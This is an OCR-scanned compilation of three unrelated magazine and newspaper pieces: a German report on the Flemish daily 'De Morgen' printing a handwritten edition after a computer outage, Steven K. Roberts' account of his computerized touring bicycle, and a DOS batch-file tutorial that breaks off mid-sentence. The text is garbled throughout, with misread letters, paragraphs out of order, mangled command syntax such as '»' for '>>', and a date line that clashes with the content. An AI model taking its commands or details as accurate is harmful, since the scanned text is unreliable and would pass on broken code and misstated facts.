Von HELMUT HETZEL
P lötzlich knallt es. Der Strom
fallt aus. Die Fernschreiber ste¬
hen still. Die Bildschirme der
Computer verdunkeln sich. Dem Re¬
dakteur wird es ganz mulmig. Auto¬
matisch schießt es ihm durch den
Kopf: „Hoffentlich ist mein Text ge¬
speichert.“
„Systemausfall im Zentralcompu¬
ter“ heißt das unter Fachleuten. In
der Regel sind solche Störungen im
Textverarbeitungs-System bei Zei¬
tungen schnell behoben. Daß das Er¬
scheinen der Zeitung dadurch wirk¬
lich gefährdet wird, ist eher unwahr¬
scheinlich.
„Genau das dachten wir auch“,
sagt Doreen Espeei, Redakteurin der
flämischen Tageszeitung „De Mor¬
gen“, die mit ihren Kollegen einen
solchen Systemausfall im Zentral¬
computer auf wohl noch nie dagewe¬
sene Weise löste. „Der Strom blieb
diesmal stundenlang weg. Die Zeit
verstrich immer schneller. Die Tech¬
niker konnten den Fehler im Compu¬
tersystem einfach nicht finden. Unse¬
re Redaktions-Schlußzeiten rückten
immer näher. Und als es 17.00 Uhr
geschlagen hatte, da war uns klar:
Jetzt muß irgend etwas geschehen.“
Nur, was? Das war jetzt die große
Frage. Es stellte sich nämlich schnell
heraus, daß für 34 Redakteure nur
Da man nicht genügend Schreib¬
maschinen hatte, eine Notausgabe
zeitlich kaum mehr zu schaffen war,
schoß den Redakteuren ein ganz un¬
gewöhnlicher Gedanke durch den
Kopf; Warum sollte man die Zeitung
nicht einmal mit der Hand schreiben?
Gedacht, getan. Damen und Her¬
ren, deren Handschrift die einstigen
Schönschräib-Übungen aus der
Grundschule noch ansatzweise er¬
kennen hefl, mußten nun an die
Front. Dann ging es los. „Dem Kolle¬
gen Computer woUte man mal ein
Schnippchen schlagen, es ihm einmal
so richtig zeigen.“ So lautete die Paro¬
le der Redaktion. „Unser Ehrgeiz war
es, eine ganz normale Zeitung zu ma¬
chen - nur eben handgeschrieben“,
erläutert Doreen Espeei. Und schlie߬
lich wollte man sich wegen dieser
kleinen technischen Störung am
nächsten Tag bei Nichterscheinung
des „Morgen“ nicht auch noch den
fteigewordenen Titel einer flämi¬
schen Satire-Zeitschrift anhängen
lassen. Das Satire-Blatt, das jüngst
Pleite machte, hieß „Der Schweiger“.
Die Leser reagierten
überwiegend positiv
Kugelschreiber und Filzstifte glüh¬
ten. Und am nächsten Morgen lag
eine einzigartige Zeitungsnummer an
den Kiosken in Flandern. Auftnacher,
fein säuberlich in Versalien und von
Hand gestylt: „Wer schreibt, der
bleibt.“ Unterzeüe; „Graphologie:
Die große Handschrift - pure Absicht
oder greifen Sie doch lieber zur Bril¬
le?“ Im Blatt dann ein Artikel zu sel¬
bigem Thema. Recherchiert war er
von den Kolleginnen und Kollegen,
deren Hände nur Hieroglyphen aufs
Papier bringen kormten. Sie mußten
ja auch irgendwie beschäftigt werden
und durften mit diesem selbstkriti¬
schen Beitrag das SchriftbUd der tat¬
sächlich zur Feder greifenden Schön¬
schreiber bis ins I-Tüpfelchen analy¬
sieren.
Ergebnis des graphologischen Gut¬
achtens: „Die Handschrift der Kolle¬
ginnen und Kollegen läßt deutlich
darauf schließen, daß es sich bei die¬
sen Personen um Idealisten mit ei¬
nem ausgesprochenen Interesse für
alles Geistige handelt. “ Aber auch der
Umkehrschluß der graphologischen
Dialektik wurde dem Leser nicht vor¬
enthalten: „Diesen Idealismus kann
man natürlich auch als einen Mangel
an Realitätssinn interpretieren.“
Einen Tag nach Erscheinen der
handgeschriebenen Nummer des
„Morgen“ (die übrigens in wenigen
Stunden ausverkauft war) bringt die
Post die schriftlichen Reaktionen der
Leser gleich stapelweise in die Re¬
daktion, klingelt das Telefon beinahe
ununterbrochen. „Es hagelt Glück¬
wünsche“, sagt eine der Sekretärin¬
nen. „Aber mit Kritik wird auch nicht
gespart. Die meisten Unzufriedenen
beldagen sich darüber, daß sie doch
picht alles entziffern konnten, was in
der Zeitung stand“, .meint Dpreen
Espeei, die selbst mit Hand an'den
Griffel legte und sich daher auch per¬
sönlich von dieser Kritik angespro¬
chen fühlt. „Insgesamt aber sind die
Reaktionen überwiegend positiv. Es
melden sich auch immer mehr
Sammler, die sich eine solche einzig¬
artige Zeitungsnummer nicht entge¬
hen lassen wollen.“
Dennoch ist sich die Redaktion, die
nebenbei auch noch gegen Zahlungs¬
unfähigkeit und drohende Einstel¬
lung des Blattes ankämpfen muß, bei
allem journalistischem Idealismus
und der vom Kollegen Computer ent¬
fesselten Kreativität darüber im kla¬
ren: „So etwas können wir uns kein
zweites Mal leisten.“
noch zwei alte Schreibmaschinen ir¬
gendwo verstaubt in einer Ecke der
Redaktion herumstanden, und auch
der Versuch, die Zeitung woanders
drucken zu lassen, war so gut wie
gescheitert. „Da wäre wohl nicht ein¬
mal mehr eine vierseitige Notausgabe
zustande gekommen.“
Viel Zeit zum Diskutieren blieb
nun nicht mehr. Entschlossen folgte
die Redaktion dem von Chefredak¬
teur . Paul Goossens ausgegebenen
Motto; „Eine Tageszeitung muß jeden
Tag erscheinen.“ Nur, wie? In dieser
brenzligen Situation bestätigte sich
die alte Binsenweisheit „Not macht
erfinderisch“.
„Dem KoDegen Computer
ein Schiiipj^hen schlagen“
^ » **
D«r handge>chri«bano „Morgen": Wer schreibt, der bleibt
Quelle unbekannt
by Steven K. Roberts
RURAL OHIO, among the
JK white clapboard houses and
autumn maple trees of Christians-
Mr bürg, the sun glinted off the solar
panels of my eight-foot-long recunri-
bent bicycle. I was hunkered over my
bicycle’s Computer, which was plugged
into the town's only pay phone, linked
via satellite with a distant publisher. Tiny
letters of text scrolied across the liquid
crystal display screen.
An old farmer rattied up to the curb in
his battered pickup, squeaked open the
door and headed for the M&M Cafe,
wearing a corn herbicide cap and green
coveralls. He squinted at me, then at
the Computer, then at the modern cable
dangling from the familiär pay phone.
He looked at the bike, at the Strange
linkages and Controls, at the blinking
LEDs — slowly shaking his head at the
apparition that had materialized in his
quiet town. Suddenly a look of under-
sunding lit his craggy features.
He spat tobacco juice into the weeds
and peered at me quizzically. "You
with NASA?"
I grinned up at him. "Why, yessir, this
here’s one o’ them Loony Excursion
Modules . . We sured at each other.
for a moment like representatives of
alien cultures, then both laughed.
The encounter, barely 100 miles into
an adventure that has now passed the
11,000-mile mark, sct the tone for the
whole journey; I am an agent of future
shock, frolicking in that stränge region
where the boundaries between tech-
nology and magic blur. I have finally
found a job I like; high-tech nomad.
Freelanclng through the years, I have
slaved away in bedrooms, living rooms,
industrial parks, basements, cubicles,
and posh offices. The same problem
always surfaced sooner or later — lack
of change. Sinking into the clutter of
my own static space, I would turn to
the Office distractions; redecorating,
making phone calls, creating new filing
Systems, fiddling with desk toys, and
staring at the same old walls. I would do
anything besides write; even passion can
be dulied by a changeless environment.
Steven Roberts uploade a
day's worth ol writlng Into
the nearest porl — a roadside
pay phone. From there It
travels to a network llke The
WELL, whare it can be sent
directly to a typesettlng
machine, as this article was.
All the cemlorts of home and
Office. A tent. A Stove. A
Computer. A shortwave trans-
mitter. A CB radlo. Solar-
recharged batteries. Naturally
the vehicle Is dubbed
the Winnebiko.
My new mobile office is different. It
materializes wherever and whenever I
need it — and though there are plenty
of distractions,’ I never have the same
one twice. By its very nature, my mobile
Office is a stimulating place (sometimes
even a thrilling one), and for the first
time in my career, working is as at least
as much fun as playing. In fact, they
are inseparable.
I live in a worid that is part bicycle, part
Computer network, and part kaleido-
scopic amalgam of lifestyles that span
the full Spectrum of human behavior.
My Office is a computerized, 36-speed,
220-pound, 8-foot-long recumbent bi¬
cycle bedecked with solar panels and
enough gizmology to re-seed Silicon
Valley after the Big One. While traveling
full time on this machine, I maintain a
freelance writing business — the ideal
way to get paid for playing. With occa-
sional layovers for major projects, I
have been doing this since late 1983,
cranking out some four million pedal
strokes, and abouc the same number
of keystrokes.
This all may sound idyllic and romantic,
but making such a caper work requires
much more than chutzpah and leg
muscles. How can an intense,
information-oriented business — an ac-
tivity that depends on word processing,
photocopying, proposals, filing, business
planning, invoicing, and all that — be
operated from a pedal-powered con-
trivance upon which every ounce
counts? How can the Illusion of stability
be maintained when dealing with such
staid institutions as banks and Insurance
Companies? And, perhaps most impor¬
tant, what are the tools that have
allowed me to break the chains that once
bound me to my desk and make a living
anywhere with virtually no overhead?
The electronic cottage on wheels that
Supports my nomadic lifestyle would
have been impossible as recently as five
years ago. I harbor over a megabyte of
memory on board, serving a closely
linked network of five microprocessors
that work together in a variety of ways.
The Systems all run on solar power.
They roll down the road aboard the
latest in human-powered vehicle design.
And they communicate with the rest of
the Information universe through Com¬
puter netwo'rks and packet satellite
links. My "Winnebiko” grows as
technology grows, slowly evolving along
with changes in device physics and Soft¬
ware philosophy.
In a sense, of course, this entire caper is
a caricature — but it is an instructive
and entertaining one, applicable to a
wide ränge of lifestyles and businesses.
My “Computing Across America” ad-
venture is a case of personal Computers
and network communication carried to
an exquisitely mad extreme.
INFORMATION FLOW
The essence of the journey is informa-
tion. I inhale it, störe it, fiddle with it,
and disgorge it in the endless attempt
to keep myself alive in the mercurial
freelance writing business. This is an
ideal enterprise for a nomadic general¬
ist, of course, for everything is copy
(and words have no mass).
But writing on the road turns out to
be an interesting challenge, particularly
when the load-carrying capacity is that
of a bicycle instead of a motor home.
Cassette dictation is a pain, yielding
non-editable speech that never seems to
get transcribed. Stopping to jot notes is
too much trouble. It has to be electronic.
Düring my first 10,000 miles, 1 carried
only one Computer, Though it was an
astonishingly robust System (the Hewlett-
Packard Portable PLUS), 1 still couldn’t
write while riding. Since 10,000 miles
corresponds to roughly 1,000 hours of
pure pedaling time (half a business year),
this is no small matter — I had far too
many days of good ideas, good inten-
tions, and no work output.
What 1 needed in addition to the HP
was a bike-mounted System, an elec¬
tronic web to capture my ideas like
passing butterflies and störe them for
later processing. I wanted to find a
machine that would support word pro¬
cessing, long-term file storage, daily
electronic mail, and a number of other
information-processing functions . . .
all on the bicycle itself.
But commercial Computers were made
for desktops, not biketops. 1 took a_
year’s sabbatical from the road and
dedicated myself to building a different.^^
Reiembling Ih«
iflstrument pane! ol
a 0*52 more Iban a
bIcyciB. Mlsjton
Control iS withln
arm’s isngtb.
my hospitality dacabase. a list of 2.500
contacts retrievable by name, location,
etc.), but its primary use is textual.
Whcn l’m on the road, everything
changes. As ideas flow from the rhyihm
of pedals. the depth of breath, and the
sweet sensations of movement, my
fingers dance a quiet staccato on the
handlebars. They move as if playing the
flute, pressing combinations of eight
Waterproof Weys to yield any of 256
binary Codes —a convenient handlebar/
keyboard that will type both letters and
Control characters. Up in the console,
the bicycle control processor reacts —
decoding the incoming data into a modi-
fied Radio Shack Mode! 100 with 256K
Tratellng wilti a
companion eases tha
stress ol a plotteetitig
llleslyle. On-boar(t CB
raillos help comitiuni-
cats on the road.
System. The original Intention — being
able to type white riding — quickly
cvolved into a complete bicycle control
and Communications System — not only
turning the Winnebiko into a mobile
Office but also starting so many on-the-
street conversations that anonymity has
become impossible. (That's half the fun.
of course. given the research potential
of social contacts.)
The principles are simple enough. The
bike carries five Computers, networked
together in ways that vary as a function
of the type of work in progress. When
l'm not pedaling. the only one in use is
HP — an exquisite machine with
896K, electronic disk, and applications
Software baked into ROM. Articles or
book chapters become files, which are
then transferred from the first available
telephone to my Ohio office via elec¬
tronic mail on the GEnie Computer
network (this article, however, was
e-maiied through The WELL). The HP
performs other jobs (such as managing
of memory. The net effect: smooth,
machine-readable text captured while
l’m on the road. yielding files that can
be downtoaded to the HP for fine tuning
and subsequeni transmission.
Bike writing was the main motive, but
with all that solar-powered processing
horsepower on board, it was inevitable
that a few other functions would emerge.
The battery-charging process is now
under Computer control. as are the
security System, seif diagnostics, elec¬
tronic compass, and more. A fourth
processor handles Speech Synthesis (it
can read text files out loud and explain
itself to curious passers-by); a fifth
manages packet data communication via
two-meter ham radio. The term elec¬
tronic cottage on wheels is by no
means frivolous, and as the trip pro-
gresses, other projects slowly get done
(or at least started) - for no complex
System is ever 100 percent complete.
l-m atready plotting the development of
the new. improved Winnebiko III — a
Chance to obsolete all this dedicated
hardware I jüst spent eight months
building and replace it with soft Instru¬
ments . . . a User Interface not unlike
the Macintosh (under control of a field
mouse, no doubt). The displays and
Controls most important to the task at
hand should be the ones that move into
visual prominence on the console —
with pull-down Windows to invoke
related functions (even satellite navi-
gation and CD-ROM maps). We have the
technology. The only missing links are a
low-power. high-resolucion display and
another year of my time.
THE NETWORtC CONNECTION
Full-time bicycle touring raises an in-
teresting issue. What, in the words of
Alvin Toffler. can a traveler use as an
“enclave of stability" while wandering
endlessly across the earth’s surface? The
bike itself. whilq deeply familiär and
"home" in many ways, is not enough
to satisfy that basic need.
My enclave of stability is found on
the networks — a stränge amalgam of
satellite and bicycle, cloud and soll, a
place that is no place yet is everyplace
at once. Give me a telephone and l'm
home: all it takes is connection of the
Computer and a few typed commands
and I cross that familiär threshold, see
the GEnie sign-on messages that let me
know l’m Inside. Beyond those electronic
portals I meet my dosest friends. keep
up with the activities of my Ohio office,
publish weekly iravel tales, seek help
with arcane technical Problems, find kin¬
dred spirits, and sometlmes just hang
around bantering with other vaporous
deniiens of the network — Intellectual
projectiOns of real humans sitting some-
where on Earth. I wander freely in
physical space, returning to my stable
home in Dataspace night after night
for stability and security.
This is central to the journey, for it
provides daily communication without
those traditional Wanderers’ hassles
of general-delivery mail and telephone
tag. I have an assistant in Ohio named
Kelly, who is my full-time universe Inter¬
face ("that means I pray for him," she
explains, only half-joking). All com¬
munication Is funneied through her;
business correspondence is processed
and reported online; personal letters are
held for the next "matter transfer"
event; phone calls are forwarded elec-
tronically. She handles money, prints and
mails manuscripts to offline publishers
and keeps old friends up to date on my
activities. Kelly is my link to business
reality, GEnie is my link to Kelly, and
the HP Computer System is my link to
the network.
And home is wherever 1 happen to be
— as long as there’s a telephone nearby.
BIKE ELECTRONICS
The Computers are just part of the
Winnebiko System, though their direct
influence extends into every Corner and
their complexity has required an on-
board microfiche documentation library.
Of nearly equal value, from the lifestyle
Standpoint, is the Communications gear.
liy mobile ham radio Station (call sign
KA80VA) is a multimode two-meter
transceiver made by Yaesu. In addition
to handling packet data satellite com-
munication (see WER #50, p. 47) with
the aid of a Pac-Comm terminal node
Controller, it allows me to stay in regulär
voice contact with my travelihg com-
panion, Maggie (KA8ZYW). (Sharing a
bicycle tour without some form of
communication is frustrating, as anyone
who as ever squinted into the mirror
for minutes at a time well knows.) With
a boom microphone built into my Bell
helmet and a push-to-talk switch on the
handlebars, Maggie is never far away
(effective bike-to-bike Simplex radio
ränge is about two miles).
Of course, having two-meter FM. capa-
bility on the bike also connects me to a
vast network of ham radio operators. I
Store the local repeater frequencies in
the radio’s memory as I approach an
area, and periodically identify myself as
an incoming bicycle mobile. Range in
this case Is upwands of 25 miles, since
repeaters are generaliy in high-profile
locations, This has led to a number of
interesting encounters, and the auto-
patch Systems often let me make
telephone calls to non-hams directly
from the bike.
A CB radio Is also on board, culturally
useless by comparison.but still valuable
enough to justify its weight. I can talk
to truckers, hail a passing motor home
for water (this saved my life in central
Utah), and shake my head at the idiomatic
yammerings of the residual good-buddy
subculture that hung on after the death
of the great CB boom.
System security is as imporunt an issue
as survival when living on a machine that
looks like a rogue NASA Creation of in-
calculable value. But it's not that people
try to steal it — most are intimidated by
the technology — it’s just that some let
their curiosity extend to flipping switches
and occasionally even climbing onto the
seat and bending the kickstand. To alert
me to such rüde behavior, I added a
paging security System with Vibration
Sensors; when armed by a front-panel
keyswitch, detected motion causes it to
transmit a tone-encoded four-watt
Signal that triggers my pocket beeper
up to three miles away.
Other radio-related devices include a
Sony digital shortwave for international
broadcast reception, a Sony Watchman
micro-TV, and an FM Stereo. Naturally,
there Is also an audio cassette deck, and
a compact disc player is planned for
under-dash installation soon. With this
load, it sometimes takes a lot more
than the usual granny gears to climb
a mountain.
Then there Is the matter of power. All
the equipment described so far, plus
behind-the-scenes control circuitry,
requires electricity — in six different
voltages. A pair of lO-watt Solarex pho-
tovoltalc panels serves as the primary
source, providing about 1.3 amps to the
12-volt SAFT Ni-Cad batteries under
ideal conditions. The charging process
can be digitally monitored from the
front panel, and the bicycle control
processor intervenes if its calculations
suggest that the batteries are in dangen
of overcharging. When too many cloudy
days occur back-to-back, a power supply
with line cord allows refueling from
house current.
Generating the other voltages is a com-
plex issue, but suffice it to say that new
"Switching power supply” devices have
made high-efficiency voltage regulation
relatively easy. The subsidiary supplies
are switched in and out of standby mode
as needed, and their Outputs are available
on the front panel to power tent lights,
small radios, and similar accessories.
Other front-panel Instrumentation
includes the obligatory Cat-Eye solar
bicycle Computer to display speed,
distance, cadence, and so on. This is
flanked by an altimeter, a two-line LCD
for the Etak electronic compass and
other sensors, time and temperature
display, and assorted Status indicators.
THE BIKE ITSELF
Everything described so far has to be
light, protected from Vibration, kept dry
even in the nastlest weather, and easy
to repair on the road. Those require-
ments are added to an already stringent
set of demands on the bicycle. for the
total System (including my body) weighs
400 pounds. It must be pedaied up
steep grades yet stop quickly; it must
not oscillate under any conditions; it
must withstand che ongoing abuses of
weather and grime and shock and salt
and overlooked maintenance.
It had to be a recumbent, of course.
Long-distance touring while hunched over
one of those old-fashioned diamond-
frame machines has always seemed
masochistic, a ritual pursuit that drives
aesthetics to the most remote fringes
of a traveler's awareness. People can
overcome almost anything, but why sub-
mit willingly to hundreds of hours of
acute discomfort?
The recumbent riding position not only
allows greater power to the pcdals, but
also eliminates all the traditional cycling
sore Spots (shoulders, neck, crotch, and
ass). As an added benefit, I can actually
see the lands l’m riding chrough — look-
ing around from my lawn-chair-on-wheels
while those on diamond frames Stare
down at the road. And on top of all
that, the recumbent can carry more (try
220 pounds plus rider on a regulär bike).
But none of the few commerciai re-
cumbents offered the right combination
of features and quality, so in the summer
of 1983 I began building one in my old
suburban Ohio basement. I quickly
learned that frame building is a complex
art form and turned for help to Franklin
Frames of Columbus, an outfit wich
long experience in making tandem bike
frames. "Hey, can you give me a hand
with this!" I asked, gescuring at my
crude brazing job.
"Uh . . . maybe we should Start over."
Good advice. The resulting machine was
designed for full-time, heavily loaded
touring, with thick-wall, chrome-moly
tubing, triple rear stays, tandem-style
crossover drive, wide-range gearing
(later expanded to 36 speeds), and a
48-spoke undished rear wheel with disc
brake. The handlebars are under the
seat, with a linkage of stainless Steel
tubing cönnecting them to the front
fork and its 16-inch custom wheel. A
stock seat from Infinity Recumbents
was mounted with machined aluminum
blocks, and the entire machine was fitted
with braze-ons to support my unusual
needs. I took it from there — using the
bike as a Substrate for the trappings of
my life, changing form every year or so
as new technobgies become available.
And 11,000 miles later, it’s still rolling
— a bit worn in places, modified here
and there — but as solid and dependable
as ever.
All of this taken together yields a re-
markably liberating System, providing
not only the tools to work anywhere
but enough media Interest to keep che
writing Business growing. The whole
affair is a cultural door-opener — at-
tracting interesting people in every town
and keeping me well provided with story
material and personal satisfaction. It’s a
freelance writer’s dream; a self-sustaining
existente of tax-deductible, full-time
research and subsequent storytelling.
For a confirmed generalist, the com¬
bination is so addiccing that ending
the journey may be impossible.
I’m often asked how far, how fast, how
many States, how long. The frequent
questions along these goal-oriented
numerical lines are hard to answer prop-
erly on the Street: I am here. Period.
Tomorrow I might be somewhere eise
(probably further south since it’s winter),
but maybe l’ll still be here — who
knows! If you think too much about
where you’re going, you lose respect
for where you are. ■
)»nii Miglat»
Wherever you on,
and whflrsvor I om,
wo'fu noighbors in
dataspaco. If you
wanf to talk about it
(or add yoursolt to my
hospitality database],
I can be reachod
through my homa nat*
work addres^ed at
"wordy." (For GEnie
slgn-up into. call
800-638-9636.) I also
cbsck Into Compu¬
Serve every lew
waaks (my id there is
72757, 15) and hne
just beguntentaliva
long-distance eiplors-
lion ol The WELL
(again, as '"wordy."
Diai 415-332-6106).
Throw another logon.
whole EARTH REVIEW SPRING 1997
27 GATE FIVE ROAD SAUSALITO, CA 9496S
PROGRAMMING
Batch itic#;
DOS batch Processing i s notoriously slow, but it does have its uses.
John DeHaven provides a c ompendium of tricks, techniques_ and
' curiosities for your reference.
What is the world's slowest inter-
pretative language? This dubious
honour surely belongs to DOS batch
Processing, which runs like granny.
Let's go ahead and Stretch a point
and call DOS batch processing a lan¬
guage. It is usefui to think of the
Statements of this language as in-
cluding the traditional batch Proces¬
sing commands, all DOS commands j
and the names of any executable
files (including other batch files) that
are available in the default directory
or via PATH.
Unfortunately, even if we gener-
ously expand the definition in this
way, DOS batch processing still isn't
a complete language, since it is not
interactive and cannot add or even
count. Even so,if you hold your jaw a
certain way there is plenty of unsus-
pected power to be found. We'll ex-
plore generation and passing of vari¬
ables, file Creation, true calls with re-
turn, giant loops under control of
'FOR' and recursion. Batch proces¬
sing is not really as boring as IBM
and Microsoft try to make it seem.
The traditional (IBM/Microsoft) dis-
cussion lists only six batch proces¬
sing commands, and we'll assume
you have a working knowledge of
these; ECHO, FOR, GOTO, IF, PAUSE,
rem and SHIFT. Of these, ECHO is
usefuI outside of batch processing,
and FOR can be used outside batch
processing to do some non-trivial
things. Four other commands, COM-
MAND, CLS, EXIT and SET — are not
usually mentioned as pari of batch
processing, although they would
rarely be used anywhere eise. We
will use them all here.
Speed
One reason batch processing runs so
slowly is that it makes a disk call for
each line of code. Evidently then, a
given batch file will run faster if you
can reduce the number of lines in it.
After you have a batch file running,
you may be able to reduce the num¬
ber of lines by combining some of
them in a FOR structure. The follow-
ing rules apply:
1 If Statements have no argument,
they may be combined;
2 If Statements have the same argu¬
ment, they may be combined; and
3 Statements with the same argu¬
ment may also be combined with
Statements with no argument.
Here are some examples to illus-
trate the above points:
FOR %%A IN (CLS VER VOL BREAK
VERIFY SET) DO %%A
FOR %%A IN (CLS A: ECHO PAUSE
CLS) DO %%A Insert back-up
diskette
FOR %%@ IN {CLS C; IF A;) DO
%%@ EXIST PP. BAT PP
FOR %%@ IN (MD CD) DO %%@
\SDIR1
These work because certain com¬
mands like CLS and PAUSE (and cer¬
tain other executable files you might
have created) do not take any argu-
ments, so when FOR expands them
with an argument, the argument is
ignored.
Batch files will run much faster if
you allocate extra 'buffers' with
CONFIG-SYS. Briefly, this specifica-
tion allocates memory for disk I/O,
one buffer per duster read from dis¬
kette. When a disk call is made, these
buffers are checked first, and if the
record is already here, no physical
disk reference will be made. The
overhead cost is about 1k per buffer
{not 512k as IBM States), above the
default two buffers. Here is how you
can be sure you have those extra
buffers activated;
1 The disk from which you boot
must contain a file calied;
'CONFIG.SYS.'
2 This file must contain the State¬
ment:
BUFFERS=9
although a (arger number will be
OK
3 For good measure, include the fol-
lowing two lines;
F1LES=99
DEVICE =ANSLSYS
The first of these will allow a much
(arger number of file handles to be
opened than the default eight, at a
cost of only 3783 bytes of memory.
Many programs need more handles
than eight, and you'll be dis-
appointed in the performance of
some of the following examples if
you don't allow this extra latitude. As
for the assignment of the ANSI.SYS
driver, 1 can't imagine anyone with
more than 16k of RAM not waTiting
this, because it allows control over
screen colours and attributes, arbit-
rary Cursor positioning and even
keyboard reassignment {16-character
keyboard macros at the DOS level
without a fancy program!)
If you are echoing many lines to
the display, you will find that it is
much faster to put in a single line to
TYPE a file that contains your multi-
line display. This will cost some disk
space, since you will have to create
this extra file. I usually denote such
files as .SCR (for 'screen') files.
If you use labels in a batch file,
those that are most likely to be calied
should be put near the beginning, as
the batch processor scans the entire
file from the beginning every time it
looks for a label.
Control
Whether you use ANSI.SYS or not,
the display understands the sequ^
ence ESC-1-2-J to mean 'clear the
screen'. The CLS command in fact
sends just this sequence to the
screen. This means that you can in¬
clude this String in any Statements
you ECHO to the display and in any
file that you might TYPE to the dis¬
play. If you write your batch files
with an editor that allows the Inser¬
tion of the ESC Code, you will be
able to echo ANSI control sequences
from the batch file. Some very nice
effects are available. If we let the ex-
pression stand for the ESC Code,
the sequence
CLS
ECHO [[2Jlnstall the back-up
diskette in drive A."G*[[5m
PAUSE
ECHO'l[2K“[10;lm
will clear the screen and display the
prompt message followed by a beep
and a blinking pause message. When
a key is struck, the blinking pause
message is wiped out.
You could output blank lines with
ECHO followed by two or more
spaces with DOS 2.x, but this no lon-
ger works with DOS 3.x. The sequ¬
ence ESC-space-<255h> will work
with DOS 3.x, the idea being to echo
the invisible character 255 hex. On
an IBM machine you can get this
character if you hold the ALT key and
press 2-5-5 on the numeric keypad.
On other machines, or with certain
editors, the procedure may be diffe¬
rent.
You may want to shut up the dis-
play at some stage. To do this you
set ECHO OFF so that you won't see
the batch procedure running, but cer¬
tain commands still natter at you.
The bit bücket 'file' NUL may be
used for this. If your file contains the
Statement
DEL *.BAK>NUL
then it will attempt to delete all Back¬
up files. If there are none, the error
message will be redirected into the
97th dimension and will not be seen.
You could also get the effect with the
Statement
IF EXIST *.BAK DEL *.BAK
but this would require a bit of extra
time for the existence test. IF EXIST
only Works for files in the current
drive and directory, which is some-
times a bother.
Variables
There are four kinds of variables in
batch Processing. %0 returns the
name of the batch file itself while
%1, %2, %3 represent tokens passed
in on the command line after the
name of the batch file. %%A, where
'A' may be any character, is the form
of a variable that takes successive
values of the 'IN' portion of a FOR
Statement.
The usual literature does not make
it obviöus that a variable in the form
%WORD% will return the value of a
variable calied 'WORD' that has been
set into the 'environment'. To install
such a variable, you execute a com¬
mand, in or out of a batch file, of the
form
SETVAR=SOME STRING
where VAR is the variable name, and
the value is any string.
To see how SET works, try the fol-
lowing batch program.
ECHO OFF
SET X=NOT
ECHO THIS DOES %X% FAIL.
SETX=
ECHO THIS DOES %X% FAIL
These variables set into the environ¬
ment are made available to all ex-
ecutable programs, and this is how
they are accessed by .BAT programs.
Often you may need to control
batch file behaviour according to
whether a variable exists or not (re-
gardless of its value). The IF State¬
ment does not directly test for this;
you must supply some minimal
String on both sides of the '=='
operator. I'll use a minimal string of
'@' to Show the two basic kinds of
existence tests.
Executes if the variable %1 exists:
IF NOT %1@==@ ...
Executes if the variable %1 does not
exist:
IF %1@==@.-..
Later we'll see some other uses for
these techniques but, as an example,
suppose you have a program that
becomes memory-resident when cal¬
ied, and if calied again will install
another copy of itself, gradually eat-
ing up your available memory (some
otherwise excellent commercial pro-
ducts have been known to behave
like this). The program is not used
every day, and is too large to install
no matter what with AUTOEX¬
EC.BAT. What you need is a batch
program that calls this maverick
program if it is needed, but only
once per session. Let's suppose our
resident-type program is calied
DBSORT. A batch file fragment that
would do the trick might be:
IF NOT %SORT%@= =
INS® DBSORT
IF NOT %SORT%@= =
INS® SET SORT=INS
After DBSORT is instalied once, the
variable SORT is set to INS in the
environment and, therefore, DBSORT
will not again be calied until the
machine is rebooted.
Creating a file with a
batch file
The command 'ECHO This is a test
message >TEST.TXT' will create a
one-line file named TEST.TXT which
contains the words This is a test
message'. One reason to do this
would be to set a flag that will last
between sessions. Things set in the
environment go away with the pow-
er, but a temporariiy-created file will
not, and its existence may be tested
by the IF EXIST Statement of batch
Processing. Your AUTOEXEC.BAT
might want to set up a large print
Spooler if you have a dot-matrix prin-
ter instalied, and omit the spooler if
a daisywheel unit is attached. The
following Statement in AUTOEX¬
EC.BAT would do it, based on the
existence or not of a file calied
DAISY.
IF NOT EXIST DAISY BIGSPOOLyi28
At some point in your configura-
tion procedure you could create the
flag file if required with the State¬
ment:
ECHO Daisywheel Printer
installed>DAISY
You can create a temporary file
and then use the temporary file to
answer a question. Two commands
that are hard to automate are DEL
and PRINT, because under certain
conditions they ask questions of the
User. The following batch sequences
will proceed without pause:
ECHO Y >YES
DEL <YES
ECHO LPT1 >PSPEC
PRINT %1 <PSPEC
DEL PSPEC
In each case, if the procedure asks
a question, it finds a file waiting with
the answer, and it takes the answer
from the file.
A multiple line file may be written
a line at a time, by using the '>>’
operator, which adds a line to a file.
'»' creates the file if it doesn't yet
exist. The following sequence writes
a three-line file (try it).
DELTEMP
ECHO This is the first line
»TEMP
ECHO This is the second line
»TEMP
ECHO This is yet another line
»TEMP
TYPE TEMP
You could even write another
batch file this way and then execute
it! Here is how to create a program
that keeps an activity log. First create
a file that contains only a carriage
return and a line feed by the follow¬
ing procedure:
COPY CON CRLF.BAT <return>
<return>
<CTRL-Z> <return>
We've named this weird little file
CRLF.BAT because there is another
important use for it that we'll discov-
er below. One use for this will come
clear if you try
DATE <CRLF.BAT
and then
DATE <CRLF.BAT >LOG
TYPE LOG
This, then, would be your activity log
program fragment. It records a date
and time in file LOG whenever It
runs:
DATE <CRLF.BAT »LOG
TIME <CRLF.BAT »LOG
For maximum speed we compress
this to:
FOR %%@ IN (DATE TIME) DO
%%®
<CRLF.BAT »LOG
You could also use this technique
to put data in a file. Below we will
see how a batch file could read such
data.
Chaining
As is well-known, if you name
another batch file in a batch file, the
next batch file begins executing, ln
this way batch files may be chained.
This chaining can be used to cause
an abrupt exit from a long batch file
that runs slowly. Suppose the batch
file has the following structure:
:LABEL1
<FIRST PROCEDURE>
GOTO EXIT
:LABEL2
<SECOND PROCEDURE
GOTO EXIT
:LAST LABEL
<LAST PROCEDURE>
:EXIT
This is likely to execute slowly be¬
cause after any given procedure is
executed, EXIT is calied and the
batch processor must read the whole
file from the beginning to find the
label in the very last line. If the do-
nothing file CRLF.BAT is still avail-
able to DOS, the preceding program
may be considerably speeded up by
writing it in the following forrn;
;LA,BEL1
<FIRST PROCEDURE>
CRLF
;LABEL2
<SECOND PROCEDURE
CRLF
iLASTLABEL
<LAST PROCEDURE>
Now, instead of searching the file
for ";EXIT", the program will directly
Chain to CRLF and abruptly quit.
DO %%@ LOOP
Soon we'll see a more advanced
application of this principle. You can
also use the command-line tokens as
items to be counted. Write
TEST.BAT;
ECHO OFF
CLS
;DO
ECHO Display for token %1
SHIFT
IF NOT %1@==@ GOTO DO
Run TEST with several calls to see
this work.
TEST
TEST 1 2 3
TEST XXX
TEST NOW THREE WORDS
TEST 1 TWO 3 2+2 5 6 7 8 9 TEN 11
Using SHIFT
Batch procedures
There are two good uses for the
SHIFT command; to allow an indefi¬
nite number of command line Para¬
meters and to count. Suppose you
have a print formatier calied
PRT.COM. You could feed several
